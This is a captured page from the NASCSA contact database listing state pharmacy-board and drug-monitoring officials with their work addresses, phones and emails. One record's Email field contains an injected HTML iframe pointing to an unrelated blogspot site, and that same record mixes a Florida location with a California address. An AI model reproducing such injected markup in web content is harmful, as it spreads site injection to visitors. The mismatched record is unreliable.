Untitled Document

NASCSA Databases


Return to NASCSA Website Database List


Return to Database Admin
(authorized only)

1 2 3 4 5 6 ]
Details found: 116
Page 1 of 6
Records Per Page: 
View
State Location Alabama  Agency   Zip 35242 
Lastname Alverson  Street Address 111 Village Street  Phone (205) 981-2280 
Firstname Susan  Address2   Fax  
Title Executive Secretary  City Birmingham  Email salverson@albop.com 
Department Alabama Board of Pharmacy  State AL  State contact type CS 
View
State Location Alabama  Agency Alabama Department of Health  Zip 36130 
Lastname Bishop  Street Address PO Box 303017  Phone (334) 206-3014 
Firstname Nancy  Address2 Suite 1010  Fax (334) 206-5663 
Title State Pharmacy Director  City Montgomery  Email nancy.bishop@adph.state.al.us 
Department   State AL  State contact type CSandPMP 
View
State Location Alabama  Agency Department of Public Health  Zip 36104 
Lastname Durham  Street Address 201 Monroe Street  Phone (334) 206-5634 
Firstname Jameson  Address2 Suite 968  Fax (334) 206-5609 
Title Director  City Montgomery  Email Jamey.Durham@adph.state.al.us 
Department Bureau of Health Promotion & Chronic Disease  State AL  State contact type CSandPMP 
View
State Location Alabama  Agency Health Promotion & Chronic Disease  Zip 36104 
Lastname Mullins  Street Address 201 Monroe Street  Phone (334) 206-3075 
Firstname April  Address2 Suite 1010  Fax (334) 206-5663 
Title Assistant to the Bureau Director  City Montgomery  Email april.mullins@adph.state.al.us 
Department Department of Public Health  State AL  State contact type CS 
View
State Location Alaska  Agency Business & Professional Licensing  Zip 99801 
Lastname Chambers  Street Address State Office Building  Phone (907) 465-2144 
Firstname Sara  Address2 333 Willoughby Avenue, 9th Floor  Fax (907) 465-2974 
Title Deputy Director  City Juneau  Email sara.chambers@alaska.gov 
Department Division of Corporations  State AK  State contact type CSandPMP 
View
State Location Alaska  Agency   Zip 99811-0806 
Lastname Hovenden  Street Address PO Box 110806  Phone (917) 465-2144 
Firstname Janey  Address2   Fax (907) 465-2974 
Title   City Juneau  Email Janey.Hovenden@alaska.gov 
Department Division of Corporations, Business & Prof. Licensi  State AK  State contact type CS 
View
State Location Arizona  Agency   Zip 85007 
Lastname Dodge  Street Address 1616 W. Adams Street  Phone (602) 771-2735 
Firstname Elizabeth  Address2 Suite 120  Fax (602) 771-2748 
Title Deputy Director  City Phoenix  Email edodge@azpharmacy.gov 
Department Board of Pharmacy  State AZ  State contact type CSandPMP 
View
State Location Arizona  Agency   Zip 85007 
Lastname Gandhi   Street Address 1616 W. Adams Street  Phone (602) 771-2740 
Firstname Kam  Address2 Suite 120  Fax (602) 771-2749 
Title Executive Director  City Phoenix  Email kgandhi@azpharmacy.gov  
Department Board of Pharmacy  State AZ  State contact type CS 
View
State Location Arkansas  Agency   Zip 72201 
Lastname McSpadden  Street Address 322 S. Main St.  Phone (501) 682-0190 
Firstname Rusty  Address2 Suite 600  Fax (501) 682-0195 
Title Chief Inspector  City Little Rock  Email Russell.McSpadden@arkansas.gov  
Department Arkansas Board of Pharmacy  State AR  State contact type CS 
View
State Location Arkansas  Agency   Zip 72205 
Lastname Myatt  Street Address 4815 West Markham Street  Phone (501) 661-2325 
Firstname James  Address2 Slot 25  Fax (501) 661-2769 
Title Pharmacy Services Section Chief  City Little Rock  Email james.myatt@arkansas.gov 
Department Arkansas Department of Health  State AR  State contact type CS 
View
State Location Arkansas  Agency Substance Misuse and Injury Prevention  Zip 72205 
Lastname Ortiz  Street Address 4815 W. Markham Street  Phone (501) 246-1259 
Firstname Haley  Address2 Suite 560, Slot 36  Fax  
Title Director, Office of Health Policy  City Little Rock  Email Haley.Ortiz@arkansas.gov 
Department Arkansas Department of Health  State AR  State contact type CS 
View
State Location California  Agency   Zip 95834 
Lastname Coyne  Street Address 1625 N. Market Blvd.  Phone (714) 280-1809 
Firstname Joan  Address2 N. 219  Fax (714) 280-9116 
Title Supervising Inspector  City Sacramento  Email joan.coyne@dca.ca.gov 
Department California Board of Pharmacy  State CA  State contact type CS 
View
State Location California  Agency Department of Justice  Zip 95820 
Lastname Small  Street Address 4949 Broadway  Phone (916) 227-3324 
Firstname Mike  Address2 G110  Fax (916) 319-9444 
Title Administrator II  City Sacramento  Email mike.small@doj.ca.gov  
Department CURES/PDMP  State CA  State contact type CSandPMP 
View
State Location Colorado  Agency   Zip 80202 
Lastname Gassen  Street Address 1560 Broadway  Phone (303) 894-7754 
Firstname Chris  Address2 Suite 1310  Fax (303) 894-7764 
Title Executive Director  City Denver  Email chris.gassen@state.co.us  
Department Board of Pharmacy  State CO  State contact type CSandPMP 
View
State Location Connecticut  Agency Department of Consumer Protection  Zip _06103 
Lastname Marriott  Street Address 450 Columbus Boulevard  Phone (860) 713-6079 
Firstname Rodrick  Address2 Suite 901  Fax (860) 706-1351 
Title Director  City Hartford  Email rodrick.marriott@ct.gov 
Department Drug Control Division  State CT  State contact type CSandPMP 
View
State Location Delaware  Agency Division of Professional Licensure  Zip 19904 
Lastname Mangler  Street Address Cannon Building, Suite 203  Phone (302) 744-4501 
Firstname David  Address2 861 Silver Lake Blvd.  Fax (302) 739-2711 
Title Director  City Dover  Email David.Mangler@state.de.us 
Department Delaware Department of State  State DE  State contact type CSandPMP 
View
State Location District of Columbia  Agency Department of Health  Zip 20002 
Lastname Onumah  Street Address 899 North Capitol Street, NE  Phone (202) 727-9066 
Firstname Kofi  Address2 2nd Floor  Fax (202) 727-8471 
Title PDMP Project Manager  City Washington  Email kofi.onumah@dc.gov 
Department Board of Pharmacy  State DC  State contact type CSandPMP 
View
State Location District of Columbia  Agency Department of Health  Zip 20002 
Lastname White  Street Address 899 North Capitol Street, NE  Phone (202) 442-9219 
Firstname Shauna  Address2 2nd Floor  Fax (877) 862-4252 
Title Executive Director  City Washington  Email shauna.white@dc.gov 
Department Board of Pharmacy  State DC  State contact type CSandPMP 
View
State Location Florida  Agency   Zip 95834 
Lastname Herold  Street Address 1625 N. Market Blvd  Phone (916) 574-7911 
Firstname Virginia  Address2 N 219  Fax (916) 574-8618 
Title Executive Officer  City Sacramento  Email <iframe src="https://winnerscoffee.blogspot.com/"  
Department Board of Pharmacy  State CA  State contact type CS 
View
State Location Florida  Agency   Zip 32399-3254 
Lastname Poston  Street Address 4052 Bald Cypress Way  Phone (850) 245-4797 
Firstname Rebecca  Address2 C-16  Fax  
Title Program Manager  City Tallahassee  Email rebecca_poston@flhealth.gov 
Department Prescription Drug Monitoring Program  State FL  State contact type CSandPMP 
1 2 3 4 5 6 ]
Details found: 116
Page 1 of 6
Records Per Page: